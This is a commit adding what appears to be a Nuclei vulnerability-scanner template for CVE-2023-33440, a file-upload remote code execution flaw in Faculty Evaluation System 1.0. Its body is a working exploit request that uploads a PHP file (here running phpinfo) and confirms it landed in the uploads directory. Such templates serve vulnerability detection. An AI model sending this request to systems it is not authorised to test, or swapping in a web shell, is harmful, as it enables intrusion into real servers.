Create CVE-2023-33440.yaml
parent
9e60dba031
commit
c7bd0427df
|
@ -0,0 +1,77 @@
|
|||
id: CVE-2023-33440
|
||||
|
||||
info:
|
||||
name: Remote Code Execution - Faculty Evaluation System
|
||||
author: Harsh
|
||||
severity: high
|
||||
description: |
|
||||
Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/172672/Faculty-Evaluation-System-1.0-Shell-Upload.html
|
||||
- https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/RCE-1.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-333440
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2023-33440
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2023,afu,rce,unauthenticated
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /eval/ajax.php?action=save_user HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="id"
|
||||
|
||||
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="firstname"
|
||||
|
||||
test
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="lastname"
|
||||
|
||||
test2
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="img"; filename="hack.php"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<?php
|
||||
|
||||
// Show all information, defaults to INFO_ALL
|
||||
phpinfo();
|
||||
|
||||
|
||||
?>
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="email"
|
||||
|
||||
abc@123.com
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
123456
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O
|
||||
Content-Disposition: form-data; name="cpass"
|
||||
|
||||
123456
|
||||
------WebKitFormBoundaryV57DTxSo887Tnp4O--
|
||||
|
||||
- |
|
||||
GET /eval/assets/uploads/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "hack.php")'
|
||||
- 'contains(body_2, "Index of /eval/assets/uploads")'
|
||||
condition: and
|
Loading…
Reference in New Issue